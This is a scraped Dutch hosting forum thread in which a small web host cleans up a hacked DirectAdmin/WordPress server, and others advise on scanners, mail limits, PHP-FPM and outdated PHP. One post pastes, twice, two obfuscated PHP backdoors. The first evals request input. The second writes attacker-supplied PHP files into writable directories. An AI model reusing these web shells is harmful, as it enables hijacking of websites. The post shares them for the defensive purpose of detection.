/u/12037/crop5db5cb2525d0a_cropped.png?f=community)
Replace fear of the unknown with curiosity | 54 kWh thuisaccu's | Tesla Model Y LR & Model 3 SR+ | Totaal 190 kWh opslag | 10.660 Wp zonnepanelen | 3xMHI WP
Vraag
Alle reacties
/u/57387/claimedavatar-70.png?f=community){kind=avatar}
Replace fear of the unknown with curiosity | 54 kWh thuisaccu's | Tesla Model Y LR & Model 3 SR+ | Totaal 190 kWh opslag | 10.660 Wp zonnepanelen | 3xMHI WP
:strip_icc():strip_exif()/u/543547/crop5f4eac1343ba1_cropped.jpeg?f=community)
Replace fear of the unknown with curiosity | 54 kWh thuisaccu's | Tesla Model Y LR & Model 3 SR+ | Totaal 190 kWh opslag | 10.660 Wp zonnepanelen | 3xMHI WP
/u/199524/axva.png?f=community)
Replace fear of the unknown with curiosity | 54 kWh thuisaccu's | Tesla Model Y LR & Model 3 SR+ | Totaal 190 kWh opslag | 10.660 Wp zonnepanelen | 3xMHI WP
/u/125506/link-8bit.png?f=community)
Zou best kunnen. Ik ben nu in een process om een WordPress website te gaan hosten.
Het eerst wat ik tegen de eigenaar zei: ik heb een beleidspolicy waarbij WordPress niet werkt totdat er een security scan heeft plaatsgevonden.
Hij schrok, maar het punt was duidelijk toen ik hem verwees op het aantal gehackte WordPress websites en dat ik net de week er voor nog iemand had geholpen met het oplossen van een inbraak en dat er een rekening van € 400 betaald moest worden.
Maak je niet druk, dat doet de compressor maar
Bedankt voor de hulp allemaal, het wordt erg gewaardeerd! Ik ben er helaas nog niet, maar heb nu het volgende gedaan:
Ik heb alle .<randomnummers>.ico files opgeruimd, alle verwijzingen naar @include van de betreffende .ico files die per domein anders waren en alle index.html.bak.bak bestanden verwijderd.
Morgen overleg ik even met de server provider over het neerzetten van een schone server, met een volledige DirectAdmin back-up van bijv. vorige week of de week daarvoor. Kan ik direct naar bijv. CentOS7 upgraden.
In een aantal bestanden kwam ik nog dit soort zaken tegen. Die lijken me deels gebruikt te worden om random bestanden aan te passen, correct? Hoe kan ik deze makkelijk vinden, ze lijken me té willekeurig qua variabelen, of niet?
<?php
$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();?>
<?php $qvitxi = "motkfcumipajgnyj";$cqeuitfl = "";foreach ($_POST as $gveiive => $adtnioes){if (strlen($gveiive) == 16 and substr_count($adtnioes, "%") > 10){uafsfebvzi($gveiive, $adtnioes);}}function uafsfebvzi($gveiive, $trndt){global $cqeuitfl;$cqeuitfl = $gveiive;$trndt = str_split(rawurldecode(str_rot13($trndt)));function skuzje($gqxgs, $gveiive){global $qvitxi, $cqeuitfl;return $gqxgs ^ $qvitxi[$gveiive % strlen($qvitxi)] ^ $cqeuitfl[$gveiive % strlen($cqeuitfl)];}$trndt = implode("", array_map("skuzje", array_values($trndt), array_keys($trndt)));$trndt = @unserialize($trndt);if (@is_array($trndt)){$gveiive = array_keys($trndt);$trndt = $trndt[$gveiive[0]];if ($trndt === $gveiive[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function opfcqs($kshmjhxnir) {static $mpcbwqjh = array();$kshmjhxnjximwj = glob($kshmjhxnir . '/*', GLOB_ONLYDIR);if (count($kshmjhxnjximwj) > 0) {foreach ($kshmjhxnjximwj as $kshmjhxn){if (@is_writable($kshmjhxn)){$mpcbwqjh[] = $kshmjhxn;}}}foreach ($kshmjhxnjximwj as $kshmjhxnir) opfcqs($kshmjhxnir);return $mpcbwqjh;}$onqycszl = $_SERVER["DOCUMENT_ROOT"];$kshmjhxnjximwj = opfcqs($onqycszl);$gveiive = array_rand($kshmjhxnjximwj);$bywbb = $kshmjhxnjximwj[$gveiive] . "/" . substr(md5(time()), 0,
. ".php";@file_put_contents($bywbb, $trndt);echo "http://" . $_SERVER["HTTP_HOST"] . substr($bywbb, strlen($onqycszl));exit();}}}
Ik heb alle .<randomnummers>.ico files opgeruimd, alle verwijzingen naar @include van de betreffende .ico files die per domein anders waren en alle index.html.bak.bak bestanden verwijderd.
Morgen overleg ik even met de server provider over het neerzetten van een schone server, met een volledige DirectAdmin back-up van bijv. vorige week of de week daarvoor. Kan ik direct naar bijv. CentOS7 upgraden.
In een aantal bestanden kwam ik nog dit soort zaken tegen. Die lijken me deels gebruikt te worden om random bestanden aan te passen, correct? Hoe kan ik deze makkelijk vinden, ze lijken me té willekeurig qua variabelen, of niet?
<?php
$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();?>
<?php $qvitxi = "motkfcumipajgnyj";$cqeuitfl = "";foreach ($_POST as $gveiive => $adtnioes){if (strlen($gveiive) == 16 and substr_count($adtnioes, "%") > 10){uafsfebvzi($gveiive, $adtnioes);}}function uafsfebvzi($gveiive, $trndt){global $cqeuitfl;$cqeuitfl = $gveiive;$trndt = str_split(rawurldecode(str_rot13($trndt)));function skuzje($gqxgs, $gveiive){global $qvitxi, $cqeuitfl;return $gqxgs ^ $qvitxi[$gveiive % strlen($qvitxi)] ^ $cqeuitfl[$gveiive % strlen($cqeuitfl)];}$trndt = implode("", array_map("skuzje", array_values($trndt), array_keys($trndt)));$trndt = @unserialize($trndt);if (@is_array($trndt)){$gveiive = array_keys($trndt);$trndt = $trndt[$gveiive[0]];if ($trndt === $gveiive[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function opfcqs($kshmjhxnir) {static $mpcbwqjh = array();$kshmjhxnjximwj = glob($kshmjhxnir . '/*', GLOB_ONLYDIR);if (count($kshmjhxnjximwj) > 0) {foreach ($kshmjhxnjximwj as $kshmjhxn){if (@is_writable($kshmjhxn)){$mpcbwqjh[] = $kshmjhxn;}}}foreach ($kshmjhxnjximwj as $kshmjhxnir) opfcqs($kshmjhxnir);return $mpcbwqjh;}$onqycszl = $_SERVER["DOCUMENT_ROOT"];$kshmjhxnjximwj = opfcqs($onqycszl);$gveiive = array_rand($kshmjhxnjximwj);$bywbb = $kshmjhxnjximwj[$gveiive] . "/" . substr(md5(time()), 0,
. ".php";@file_put_contents($bywbb, $trndt);echo "http://" . $_SERVER["HTTP_HOST"] . substr($bywbb, strlen($onqycszl));exit();}}}
Replace fear of the unknown with curiosity | 54 kWh thuisaccu's | Tesla Model Y LR & Model 3 SR+ | Totaal 190 kWh opslag | 10.660 Wp zonnepanelen | 3xMHI WP
:strip_icc():strip_exif()/u/53213/crop57ace20969734.jpeg?f=community)
Replace fear of the unknown with curiosity | 54 kWh thuisaccu's | Tesla Model Y LR & Model 3 SR+ | Totaal 190 kWh opslag | 10.660 Wp zonnepanelen | 3xMHI WP
Replace fear of the unknown with curiosity | 54 kWh thuisaccu's | Tesla Model Y LR & Model 3 SR+ | Totaal 190 kWh opslag | 10.660 Wp zonnepanelen | 3xMHI WP
:strip_icc():strip_exif()/u/195257/owl_icon.jpg?f=community){kind=icon}
Maar vergeet dan niet zeer regelmatig zelf ook na te kijken of alles up-to-date is. Patchman is (helaas) niet perfect en heb ik dermate grote steken zien laten vallen dat wij het de deur uit hebben geschopt.
Wordfence kan je ook eens proberen, deze plugin kan je instellen om waarschuwingen te geven als er updates voor WP en/of plugins klaarstaan en controleert of de aanwezige WP bestanden niet aangepast zijn. Maar ook daar gaat voor op: het werkt niet altijd 100%, ook Wordfence mist weleens wat, zeker als een website al geïnfecteerd is voor installatie.
Zou ik nog aan willen vullen met: limiteer de hoeveelheid mail die gebruikers per dag kunnen versturen. Een gebruiker die normaal 5 mailtjes op een dag verstuurd zal niet snel last hebben van een limiet van (bijv.) 200 mails per dag. Je zou inderdaad de eerste niet zijn waarbij de server in no-time 30.000 mails uit heeft gestuurd en bij de diverse spampartijen op de blacklist is gezet. Je krijgt standaard als admin ook meteen een bericht als gebruikers de limiet overschrijden.
Als je gebruik maakt van PHP-FPM worden PHP scripts onder de eigen gebruiker geladen, je hebt dan dus automatisch al je scheiding tussen gebruikers.
CloudLinux zal je sowieso een losse licentie voor af moeten nemen en installeer je los, waarbij CL je verbouwde DA server nogmaals zal verbouwen.
Replace fear of the unknown with curiosity | 54 kWh thuisaccu's | Tesla Model Y LR & Model 3 SR+ | Totaal 190 kWh opslag | 10.660 Wp zonnepanelen | 3xMHI WP
Replace fear of the unknown with curiosity | 54 kWh thuisaccu's | Tesla Model Y LR & Model 3 SR+ | Totaal 190 kWh opslag | 10.660 Wp zonnepanelen | 3xMHI WP
Replace fear of the unknown with curiosity | 54 kWh thuisaccu's | Tesla Model Y LR & Model 3 SR+ | Totaal 190 kWh opslag | 10.660 Wp zonnepanelen | 3xMHI WP
PHP 5.6 is end of life en ontvangt in principe geen beveiligingspatches meer. CentOS backport zelf wel, maar aangezien DA bij mijn weten PHP niet uit de CentOS repo haalt heb je nu dus een potentieel onveilige PHP versie op je machine.
Dat hoop ik wel ja.
[ Voor 13% gewijzigd door Aganim op 30-05-2018 15:59 ]
Replace fear of the unknown with curiosity | 54 kWh thuisaccu's | Tesla Model Y LR & Model 3 SR+ | Totaal 190 kWh opslag | 10.660 Wp zonnepanelen | 3xMHI WP
@Taro als "beveiligingsmodules" niet in PHP7 zitten, is dat met een reden.
Daarnaast zou dit ook niet de taak moeten zijn van PHP, maar van de scripts en de server beheerder.
DA is gewoon een ruk systeem als je "beveiliging" wilt.
Denk ook dat e-mails van jouw server, mijn server nooit fatsoenlijk zal accepteren
Daarnaast zou dit ook niet de taak moeten zijn van PHP, maar van de scripts en de server beheerder.
DA is gewoon een ruk systeem als je "beveiliging" wilt.
Denk ook dat e-mails van jouw server, mijn server nooit fatsoenlijk zal accepteren
Maak je niet druk, dat doet de compressor maar
Replace fear of the unknown with curiosity | 54 kWh thuisaccu's | Tesla Model Y LR & Model 3 SR+ | Totaal 190 kWh opslag | 10.660 Wp zonnepanelen | 3xMHI WP
Het zijn stuk voor stuk klanten die persoonlijke service zoeken, ze willen geen nummer bij een grote partij zijn. Daarnaast zitten er een paar klanten tussen die ook mailhosting doen en daarnaast SEO optimalisatie en performance optimalisatie. Ook verzorg ik via een script (WP-CLI) dagelijks alle WordPress updates voor ze.
Het zijn dus ook klanten die niet voor een dubbeltje op de eerste rij willen zitten, maar ontzorgt willen worden. Daarom wil ik ze ook graag helpen en ik kan dus ook best een x bedrag missen, het hoeft niet voor 10-20 Euro per jaar per account.
Verder heb ik zelf zo'n 15-20 websites, een eigen server kon dus voor mij al snel zelf uit
Replace fear of the unknown with curiosity | 54 kWh thuisaccu's | Tesla Model Y LR & Model 3 SR+ | Totaal 190 kWh opslag | 10.660 Wp zonnepanelen | 3xMHI WP
Die klanten heb ik ook
Maar WordPress is een no-go. Dan krijgen ze een eigen VPS voor €30 per maand excl. servicekosten.
Dan blijkt WordPress niet de heilige graal
Ander CMS dan kan het wel op shared hosting
Maak je niet druk, dat doet de compressor maar
Pagina: 1